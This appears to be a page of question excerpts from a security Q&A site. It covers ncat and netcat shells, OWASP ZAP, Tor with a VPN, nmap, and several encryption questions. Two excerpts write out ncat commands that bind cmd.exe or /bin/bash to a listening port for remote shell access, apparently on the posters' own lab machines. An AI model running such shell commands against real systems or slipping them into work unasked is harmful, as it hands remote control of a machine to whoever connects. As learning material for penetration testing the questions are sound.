Collaborate Disseminate
I’m currently attempting to use ncat to bind a cmd shell in Windows for remote access in Kali Linux.
On Windows, I first run:
ncat –exec cmd.exe -vnl Port –ssl
On Kali Linux, I then run:
ncat -v WindowsIP Port –ssl
I am trying to find out how to turn off the automated scanner in ZAP. I am not even sure if it is on.
How and where can I tell if the scanner is on? I just want it to be a pure proxy for the time being for testing purposes.
Continue reading How do I turn off automated testing in OWASP ZAP?
How can I use netcat as a handler for windows/meterpreter/reverse_tcp payload? I am getting a connection but am unable to run any command
Continue reading Netcat as a handler for windows/meterpreter/reverse_tcp payload
If I switch VPN on, then use Tor browser, can the VPN provider still see what is passing through Tor?
I am thinking it can’t, right? Because the Tor browser encrypts the data into the Onion layer before it sends to the first node?
I tried to scan my network for hosts. However, it seems like it didn’t scan the MAC. I tried all kinds of TCP and UDP scans on different kind of ports but the hosts doesn’t show up.
It’s strange because I can ping to the ho… Continue reading Nmap – host discovery doesn’t show all hosts
I’m trying to create an encrypted reverse bind shell from my Windows machine to my Linux machine. Being totally new to penetration testing, I’m having a little bit of trouble.
First, on my Linux (Kali) machine, I setup a listener on port 4444:
ncat -nlvp 4444 -e /bin/bash --ssl
I’ve been researching a lot and found out I may need to make it interactive, so I tried adding:
ncat -nlvp 4444 -e '/bin/bash -i' --ssl
Now, on my Windows box, I connect to it and try to access the terminal for my Linux machine by typing in the following command:
ncat -v windowsIPAddress 4444 --ssl
Now, my Linux box has no problem listening, but the output on my Windows box only shows:
C:\Windows\ncat> ncat -v linuxBoxIP 4444 --ssl
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: .
C:\Windows\ncat>
So, I have no idea why it only shows a”.” and doesn’t connect to the Linux command prompt. I’ve been researching for a long time, and it appears that I’m doing everything correctly, but I’m obviously not.
Does anyone have any insight on this issue?
Continue reading Trying to create a reverse bind shell from Windows to Linux
I’m seeing that MS just released a new version of SQL Server which supports deterministically encrypting a column, so that you can still query it:
https://msdn.microsoft.com/en-us/library/mt163865(v=sql.130).aspx#sectionToggle1
In this exa… Continue reading Is SQL Server 2016’s Deterministic Encryption any good?
just started researching on the latest PHP encryption methods, I’ve found out my favorite algorithms are compromised. MD5 is no good, SHA-1 has “found flaws”, SHA-512 isn’t “meant for passwords”, these are all from various St… Continue reading Which PHP encryption method is most incidentally-secure?
My understanding is that with the WebRTC peer-to-peer data API, communications between peers are encrypted via a modified form of SSL. Where are the keys for the peer-to-peer SSL connection generated, though? On the original … Continue reading WebRTC P2P SSL – Where are the keys generated?
Is there a hash algorithm that will help you identify similar files or strings? For example, the hash for ABC and XBC would be similar rather than radically different as is usually the case. I know of one measure of similarity, Edit Distan… Continue reading Is there a hash algorithm that can identify similar files or strings?